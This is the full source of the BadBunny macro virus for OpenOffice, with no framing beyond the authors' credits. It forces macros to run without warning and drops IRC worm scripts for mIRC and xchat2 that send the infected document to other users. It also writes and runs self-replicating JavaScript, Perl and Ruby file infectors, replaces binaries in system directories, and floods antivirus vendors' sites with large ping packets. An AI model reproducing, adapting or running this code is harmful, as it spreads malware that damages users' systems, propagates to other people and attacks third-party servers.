SB.BadBunny by wargame & necronomikon || Project Folder

Dim Url As String
Dim myFileProp as Object

Sub badbunny()
rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz]
Dim mEventProps(1) as new com.sun.star.beans.PropertyValue
mEventProps(0).Name = "EventType"
mEventProps(0).Value = "StarBasic"
mEventProps(1).Name = "Script"
mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame"
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers 
oDocument = ThisComponent
otext=oDocument.text
ocursor=otext.createtextcursor()
otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false)
url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg") 
oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() )
msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\"
call ping
end sub

sub startgame
if GetGUIType =1 then 'windows
call win
end if
if GetGUIType =3 then 'MacOS
call mac
end if
if GetGUIType =4 then 'linux
call lin
end if
end sub

sub win
Dim dirz As String
Dim dummy()
Dim iVar As Integer
Dim Args(0) as new com.sun.star.beans.PropertyValue
Args(0).Name = "MacroExecutionMode"
Args(0).Value = _
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers 
   datei="c:\badbunny.odg"
   dateiurl=converttourl(datei)
   odoc=thisComponent
   odoc.storeasurl(dateiurl,dummy())
dirz=Environ ("programfiles")

Open "c:\drop.bad" For Output As #1
Print #1, "[script]"
Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"
Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*"
Print #1, "n2=on 1:start:{"
Print #1, "n3=  /if $day == Friday { /echo  }"
Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan"
Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-"
Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-"
Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me"
Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me"    
Print #1, "n9=on 1:part:#:{"
Print #1, "n10=set %M_E $me"
Print #1, "n11=set %NickName $nick"
Print #1, "n12=set %ccd .dcc"
Print #1, "n13=  if %NickName != %M_E {"
Print #1, "n14=    /q %NickName lets do it like a rabbit...;)"
Print #1, "n15=    /msg %NickName Be my bunny!"
Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg"
Print #1, "n17=  }"
Print #1, "n18=}"
Close #1

if ( Dir(dirz &"\mirc") <> "") then
Filecopy "c:\drop.bad" ,  dirz &"\mirc\script.ini"
end if
if ( Dir("c:\mirc") <> "") then
Filecopy "c:\drop.bad" ,  "c:\mirc\script.ini"

end if
if ( Dir(dirz &"\mirc32") <> "") then
Filecopy "c:\drop.bad" ,  dirz &"\mirc32\script.ini"
end if
if ( Dir("c:\mirc32") <> "") then
Filecopy "c:\drop.bad" ,  "c:\mirc32\script.ini"
end if

Open "c:\badbunny.js" For Output As #2
Print #2, "// BadBunny"
Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))"
Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)"
Print #2, "var OurCode=me.Read(1759)"
Print #2, "me.Close()"
Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''"
Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()"
Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }"
Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)"
Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)"
Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())"
Print #2, "{"
Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")"
Print #2, "{"
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)"
Print #2, "var Marker=filez.Read(11)"
Print #2, "var allinone=Marker+filez.ReadAll()"
Print #2, "filez.Close()"
Print #2, "if(Marker!=""// BadBunny"")"
Print #2, "{"
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)"
Print #2, "filez.Write(OurCode+allinone)"
Print #2, "filez.Close()"
Print #2, "}"
Print #2, "}"
Print #2, "}"
Print #2, "function foundit()"
Print #2, "{"
Print #2, "fcodea=''; count=0; randon='';"
Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }"
Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }"
Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)"
Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '"
Print #2, "i+=fcodea.length;"
Print #2, "}"
Print #2, "//->"
Close #2
Shell("c:\badbunny.js",0)
oDoc.store()
End Sub

sub lin()
'xchat2worm part by WarGame
dim HomeDir as string
dim xchat2script as string
dim perlvir as string
dim cmd as string
dim WgeT as string
Dim dummy()
Dim iVar As Integer
Dim Args(0) as new com.sun.star.beans.PropertyValue
Args(0).Name = "MacroExecutionMode"
Args(0).Value = _
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers 
   datei="/tmp/badbunny.odg"
   dateiurl=converttourl(datei)
   odoc=thisComponent
   odoc.storeasurl(dateiurl,dummy())

' get home dir
HomeDir = Environ("HOME")

'build the path of our xchat2 script
if HomeDir = "" then
' I could not get $HOME !

else
xchat2script = HomeDir & "/.xchat2/badbunny.py"

' drop the python script
Open xchat2script For Output As #1
print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34)
print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34)
print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34)
print #1,"import xchat"
print #1,"def onkick_cb(word, word_eol, userdata):"
print #1,"	if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:"
print #1,"		xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")"
print #1,"	return xchat.EAT_NONE"
print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)"
close #1
endif

'drop the perl virus
perlvir = HomeDir & "/BadBunny.pl"
open perlvir for output as #1
print #1,"#BadBunny"
print #1,"open(File,$0);@MyCode = ;close(File);"
print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){"
print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){"
print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}"
close #1
cmd = "perl " & perlvir
shell(cmd,0)

oDoc.store()
end sub

sub mac()
Dim iVar As Integer
iVar = Int((15 * Rnd) -2)
Select Case iVar
Case 1 To 5
call one
Case 6, 7, 8
call two
Case Is > 8 And iVar < 11
call one
Case Else
call two
End Select
end sub

sub one ()
'thx to skyout
Open "badbunny.rb" For Output As #1
print #1,"#!/usr/bin/env ruby"
print #1,"require 'ftools'"
print #1,"def replacecmd(cmdname, dirpath)"
print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")"
print #1,"oldcmd   = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)"
print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n"""
print #1,"oldcmd.puts ""puts \""\"""
print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\"""""
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny"""""
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut"""
print #1,"oldcmd.puts ""puts \""\"""""
print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\"""""
print #1,"oldcmd.puts ""puts \""Executing in ...\"""""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""3\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""2\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""1\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""\"""
print #1,"oldcmd.puts ""for $args in $* do"""
print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\"""
print #1,"oldcmd.puts ""end"""
print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\"""
print #1,"oldcmd.puts ""exit 0"""
print #1,"end"
print #1,"$binary_dirs = Array.new"
print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]"
print #1,"for $dir in $binary_dirs do"
print #1,"if File.directory?($dir) then"
print #1,"if File.writable?($dir) then"
print #1,"Dir.open($dir).each do |file|"
print #1,"next if file =~ /^\S+_/ || file == ""."" || file == "".."""
print #1,"replacecmd(file, $dir)"
print #1,"end"
print #1,"end"
print #1,"end"
print #1,"end"
print #1,"exit 0"
close #1
Shell("badbunny.rb",0)
end sub

sub two() 'thx to SPTH for this...
Open "badbunnya.rb" For Output As #2
print #2,"# BADB"
print #2,"mycode="""
print #2,"mych=File.open(__FILE__)"
print #2,"myc=mych.read(1)"
print #2,"while myc!=nil"
print #2,"mycode+=myc"
print #2,"myc=mych.read(1)"
print #2,"end"
print #2,"mycode=mycode[mycode.length-734,734]"
print #2,"cdir = Dir.open(Dir.getwd)"
print #2,"cdir.each do |a|"
print #2,"if File.ftype(a)==""file"" then"
print #2,"if a[a.length-3, a.length]=="".rb"" then"
print #2,"if a!=File.basename(__FILE__) then"
print #2,"fcode="""
print #2,"fle=open(a)"
print #2,"badb=fle.read(1)"
print #2,"while badb!=nil"
print #2,"fcode+=badb"
print #2,"badb=fle.read(1)"
print #2,"end"
print #2,"fle.close"
print #2,"if fcode[fcode.length-732,4]!=""BADB"" then"
print #2,"fcode=fcode+13.chr+10.chr+mycode"
print #2,"fle=open(a,""w"")"
print #2,"fle.print fcode"
print #2,"fle.close"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"cdir.close"
close #2
Shell("badbunnya.rb",0)
End Sub

sub ping()
Shell("ping -l 5000 -t www.ikarus.at",0)
Shell("ping -l 5000 -t www.aladdin.com",0)
Shell("ping -l 5000 -t www.norman.no",0)
Shell("ping -l 5000 -t www.norman.com",0)
Shell("ping -l 5000 -t www.kaspersky.com",0)
Shell("ping -l 5000 -t www.kaspersky.ru",0)
Shell("ping -l 5000 -t www.kaspersky.pl",0)
Shell("ping -l 5000 -t www.grisoft.cz",0)
Shell("ping -l 5000 -t www.symantec.com",0)
Shell("ping -l 5000 -t www.proantivirus.com",0)
Shell("ping -l 5000 -t www.f-secure.com",0)
Shell("ping -l 5000 -t www.sophos.com",0)
Shell("ping -l 5000 -t www.arcabit.pl",0)
Shell("ping -l 5000 -t www.arcabit.com",0)
Shell("ping -l 5000 -t www.avira.com",0)
Shell("ping -l 5000 -t www.avira.de",0)
Shell("ping -l 5000 -t www.avira.ro",0)
Shell("ping -l 5000 -t www.avast.com",0)
Shell("ping -l 5000 -t www.virusbuster.hu",0)
Shell("ping -l 5000 -t www.trendmicro.com",0)
Shell("ping -l 5000 -t www.bitdefender.com",0)
Shell("ping -l 5000 -t www.pandasoftware.comm",0)
Shell("ping -l 5000 -t www.drweb.com",0)
Shell("ping -l 5000 -t www.drweb.ru",0)
Shell("ping -l 5000 -t www.viruslist.com",0)
end sub